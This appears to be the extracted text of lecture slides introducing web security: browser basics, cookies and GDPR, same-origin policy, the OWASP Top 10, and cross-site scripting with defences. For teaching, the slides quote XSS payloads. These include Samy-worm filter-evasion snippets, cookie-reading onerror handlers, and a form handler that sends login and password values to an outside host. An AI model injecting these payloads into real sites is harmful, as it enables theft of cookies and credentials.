Intro to Web Security What is the Internet? global system of - - PowerPoint PPT Presentation

Intro to Web Security

What is the Internet?

• “global system of interconnected computer

networks that use the Internet protocol suite (TCP/ IP) to link devices worldwide” - Wikipedia

… and why do we care?

• The interconnectedness of the Internet brings

people together.

• People write bad software.

What Webpages are Made Of

• HTML
• CSS
• JavaScript
• Others?
• VBScript
• Flash (dead)
• Java (dying)

HTML

• Markup language
• HTML5 added interactive components:
• Canvas
• Audio
• Video

CSS

• Style language
• Built to separate content from style
• CSS3 — built in tandem with HTML5

JavaScript

• Scripting language (similar to Python)
• Server side (NodeJS)
• Client side
• Stateless

Browser Rendering

• Basic browser execution model
• Each browser window or frame
• Loads content
• Renders it
• Processes HTML and scripts to display page
• May involve images, subframes, etc.
• Responds to events
• Events can be
• User actions: OnClick, OnMouseover
• Rendering: OnLoad, OnBeforeUnload
• Timing: setTimeout(), clearTimeout()
• Guide: http://www.w3schools.com/js/js_events.asp
• Complete list: http://www.w3schools.com/jsref/dom_obj_event.asp

Cookies

• Used to store state on user’s machine

Browser

Server

POST … HTTP Header: Set-cookie: NAME=VALUE ; domain = (who can read) ; expires = (when expires) ; secure = (only over SSL) Browser

Server

POST … Cookie: NAME = VALUE HTTP is stateless protocol; cookies add state If expires=NULL: this session only

Cookies

• Name, value, attributes:
• expiration date
• hostname valid for
• Secure (?)
• only over HTTPS
• HTTPOnly (?)
• not over JavaScript

GDPR + Cookies

nytimes.com

GDPR + Cookies

cnn.com

GDPR + Cookies

tulsaworld.com

GDPR + cookies

• From http://ec.europa.eu/justice/data-protection/

reform/files/regulation_oj_en.pdf

• (30): “Natural persons may be associated with
• nline identifiers […] such as internet protocol

addresses, cookie identifiers or other identifiers […]. This may leave traces which, in particular when combined with unique identifiers and other information received by the servers, may be used to create profiles of the natural persons and identify them.”

Same Origin Policy

• Same origin policy: Scripts can access information

as long as webpages have the same origin:

• Protocol (http:// vs. https://)
• Host (www.unm.edu vs. cs.unm.edu vs.

unm.edu)

• Port (:80 vs. :443)

Reading

• Security
• Privacy
• Anonymity
• Trust
• Security Policy/Security Failure

Reading

Policy Mechanism Assurance Incentives

OWASP Top 10 - 2017

• 1. Injection
• 2. Broken Authentication
• 3. Sensitive Data Exposure
• 4. XML External Entities
• 5. Broken Access Control
• 6. Security Misconfiguration
• 7. Cross-Site Scripting
• 8. Insecure Deserialization
• 9. Using Components with Known Vulnerabilities

10.Insufficient Logging and Monitoring.

OWASP Top 10 - 2017

• 1. Injection
• 2. Broken Authentication
• 3. Sensitive Data Exposure
• 4. XML External Entities
• 5. Broken Access Control
• 6. Security Misconfiguration
• 7. Cross-Site Scripting
• 8. Insecure Deserialization
• 9. Using Components with Known Vulnerabilities

10.Insufficient Logging and Monitoring.

Cross Site Scripting

• A vulnerability that allows an attacker to run

JavaScript on a victim webpage

• Why?
• COOKIES
• DATA

Types of XSS

• Methods for injecting malicious code:
• Reflected XSS
• the attack script is reflected back to the user as part
• f a page from the victim site
• Persistant/Stored XSS
• the attacker stores the malicious code in a resource

managed by the web application, such as a database

• Others, such as DOM-based attacks

Reflected XSS

• Webpages that show results without sanitizing

inputs properly

• Webforms

Reflected XSS

Attack Server Server Victim User Victim C

• l

l e c t e m a i l a d d r send malicious email click on link echo user input 1 2 3 s e n d v a l u a b l e d a t a 5 4 Email version

PayPal 2006 Example Vuln

• Attackers contacted users via email and fooled

them into accessing a particular URL hosted on the legitimate PayPal website.

• Injected code redirected PayPal visitors to a page

warning users their accounts had been compromised.

• Victims were then redirected to a phishing site and

prompted to enter sensitive financial data.

Persistant XSS

• Webpages that store results without proper

sanitizing and then display them to users later

• Web forums

Reflected XSS

Attack Server Server Victim User Victim click on link echo user input 3 s e n d v a l u a b l e d a t a 5 4 Send bad stuff Reflect it back

Persistant XSS

Attack Server Server Victim User Victim Inject malicious script request content receive malicious script 1 2 3 s t e a l v a l u a b l e d a t a 4 Store bad stuff Download it

Samy Worm (MySpace 2005)

• Users can add JavaScript to their page to customize it.

Some tags are blocked.

• blocked: script, body, onClick, onAnything, etc.
• Embed JavaScript in other tags.
• <div style="background:url('javascript:alert(1)')">
• Stored function in a div.
• <div id="mycode" expr="alert('hah!')"

style="background:url('javascript:eval(document.all.mycode.e xpr)')">

https://samy.pl/myspace/tech.html

Samy Worm (MySpace 2005)

• MySpace stripped out the word “javascript”
• Hid as java\nscript
• Similarly, MySpace striped out “innerHTML”
• alert(eval('document.body.inne' + 'rHTML'));
• With additional JavaScript hacking and obfuscation:
• Samy worm infects anyone who visits an infected MySpace page

… and adds Samy as a friend.

• Samy had millions of friends within 24 hours.

Stored XSS as Images

• Suppose pic.jpg on web server contains HTML !
• request for http://site.com/pic.jpg results in:

HTTP/1.1 200 OK … Content-Type: image/jpeg <html> fooled ya </html>

• IE will render this as HTML (despite Content-Type)
• Consider photo sharing sites that support image uploads
• What if attacker uploads an “image” that is a script?

Protecting Against XSS

• The best way to protect against XSS attacks:
• Validates all headers, cookies, query strings, form

fields, and hidden fields (i.e., all parameters) against a rigorous specification of what should be allowed.

• Do not attempt to identify active content and remove,

filter, or sanitize it. There are too many types of active content and too many ways of encoding it to get around filters for such content.

• Adopt a ‘positive’ security policy that specifies what is
• allowed. ‘Negative’ or attack signature based policies

are difficult to maintain and are likely to be incomplete.

Input Data Validation + Filtering

• Never trust client-side data
• Best: allow only what you expect
• Remove/encode special characters
• Many encodings, special chars!
• E.g., long (non-standard) UTF-8 encodings

Output filtering/encoding

• Remove / encode (X)HTML special chars
• &lt; for <, &gt; for >, &quot for “ …
• Allow only safe commands (e.g., no <script>…)
• Caution: `filter evasion` tricks
• See XSS Cheat Sheet for filter evasion
• E.g., if filter allows quoting (of <script> etc.), use

malformed quoting: <IMG “””><SCRIPT>alert(“XSS”)…

• Or: (long) UTF-8 encode, or…
• Caution: Scripts not only in <script>!
• Examples in a few slides

Caution: Scripts not only in <script>!

• JavaScript as scheme in URI
• <img src=“javascript:alert(document.cookie);”>
• JavaScript On{event} attributes (handlers)
• OnSubmit, OnError, OnLoad, …
• Typical use:
• <img src=“none” OnError=“alert(document.cookie)”>
• <iframe src=`https://bank.com/login` onload=`steal()`>
• <form> action="logon.jsp" method=“post" onsubmit="hackImg=new

Image; hackImg.src='http:// www.digicrime.com/'+document.forms(1).login.value'+':'+ document.forms(1).password.value;" </form>

Problems with filters

• Suppose a filter removes <script
• Good case
• <script src=“ ...” → src=“...”
• But then
• <scr<scriptipt src=“ ...” → <script src=“ ...”

Takeaways

• Key concepts
• Whitelisting vs. blacklisting
• Output encoding vs. input sanitization
• Sanitizing before or after storing in database
• Dynamic versus static defense techniques
• Good ideas
• Static analysis
• Taint tracking
• Framework support
• Continuous testing
• Bad ideas
• Blacklisting
• Manual sanitization

Demo

https://alf.nu/alert1